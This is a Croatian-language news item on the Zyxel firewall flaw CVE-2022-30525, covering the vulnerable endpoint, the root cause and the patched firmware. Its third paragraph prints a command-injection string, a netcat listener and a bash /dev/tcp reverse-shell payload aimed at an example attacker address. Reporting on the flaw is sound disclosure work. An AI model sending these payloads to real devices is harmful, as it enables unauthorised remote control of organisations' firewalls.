Ranjivost u Zyxel vatrozidima koja dopušta izvršavanje koda bez provjere autentičnosti

Kritična ranjivost (CVE-2022-30525) identificirana je u Zyxel uređajima serije ATP, VPN i USG FLEX, dizajniranih za organiziranje rada vatrozida, IDS-a i VPN-a u poduzećima, što omogućuje vanjskom napadaču da izvrši kod na uređaj bez korisničkih prava bez autentifikacije. Da bi izvršio napad, napadač mora moći slati zahtjeve uređaju koristeći HTTP/HTTPS protokol. Zyxel je popravio ranjivost u nadogradnji firmvera ZLD 5.30. Prema podacima servisa Shodan, trenutno postoji 16213 potencijalno ranjivih uređaja na globalnoj mreži koji prihvaćaju zahtjeve putem HTTP/HTTPS-a.

Operacija se provodi slanjem posebno dizajniranih naredbi web rukovatelju /ztp/cgi-bin/handler, dostupnom bez autentifikacije. Problem je uzrokovan nedostatkom odgovarajućeg čišćenja parametara zahtjeva prilikom izvršavanja naredbi na sustavu pomoću os.system poziva koji se koristi u biblioteci lib_wan_settings.py i izvršava se prilikom obrade operacije setWanPortSt.

Na primjer, napadač može proslijediti niz “; ping 192.168.1.210;" što će dovesti do izvršenja naredbe “ping 192.168.1.210” na sustavu. Da biste dobili pristup naredbenoj ljusci, možete pokrenuti “nc -lvnp 1270” na vašem sustavu, a zatim pokrenuti obrnutu vezu slanjem zahtjeva uređaju s '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Izvor: opennet.ru

Dodajte komentar